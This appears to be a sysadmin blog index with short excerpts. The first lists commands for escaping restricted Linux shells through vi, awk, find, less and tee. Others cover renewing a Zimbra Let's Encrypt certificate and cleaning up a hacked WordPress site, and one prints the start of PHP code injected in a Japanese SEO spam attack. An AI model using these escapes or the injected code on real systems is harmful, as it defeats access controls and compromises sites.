Escaping Restricted Linux Shells

From vi or vim :set shell=/bin/bash Next, type and execute: :shell Another method is to type: :! /bin/bash From awk awk ‘BEGIN {system(“/bin/sh”)}’ From find find / -name blahblah -exec /bin/awk ‘BEGIN {system(“/bin/sh”)}’ \; From more, less and man ‘! /bin/sh’ ‘!/bin/sh’ ‘!bash’ From tee echo “evil script code” | tee script.sh From your fav […]

Renew letsencrypt of Zimbra server

After installing Letsencrypt SSL according to https://wiki.zimbra.com/wiki/Installing_a_LetsEncrypt_SSL_Certificate article you need to renew certificate later. To renew certificate you can do following: Login to server as root $ letsencrypt renew Change directory to Zimbra Letsecnrpyt SSL folder # cd /opt/zimbra/ssl/letsencrypt/ Copy new SSL files to Zimbra Letsencrypt folder then change owner to Zimbra. # cp /etc/letsencrypt/live/yourdomain.com/* […]

How to restore hacked WordPress website? v2

BACKUP!! BACKUP!! BACKUP!! Make sure you do backup regularly or at least ask your clients’ to take a clean backup of website. Change Password After your website gets hacked, first thing to do is to make sure that you change passwords ie: cpanel, database, wp-admin, etc Replace Files/Folders 1. Rename public_html folder to something else […]

Japanese seo hack WordPress

Japanese seo in google

Ever encountered php unknown code injected at top of your index.php file? I have same issue in my WordPress website where some unknown php scripts was injected at top of index.php file. Below is the sample of that php code: &lt?php @set_time_limit(3600); @ignore_user_abort(1); $xmlname = ‘mapss271.xml’; $jdir = ”; $smuri_tmp = smrequest_uri(); if($smuri_tmp==”){ $smuri_tmp=’/’; } […]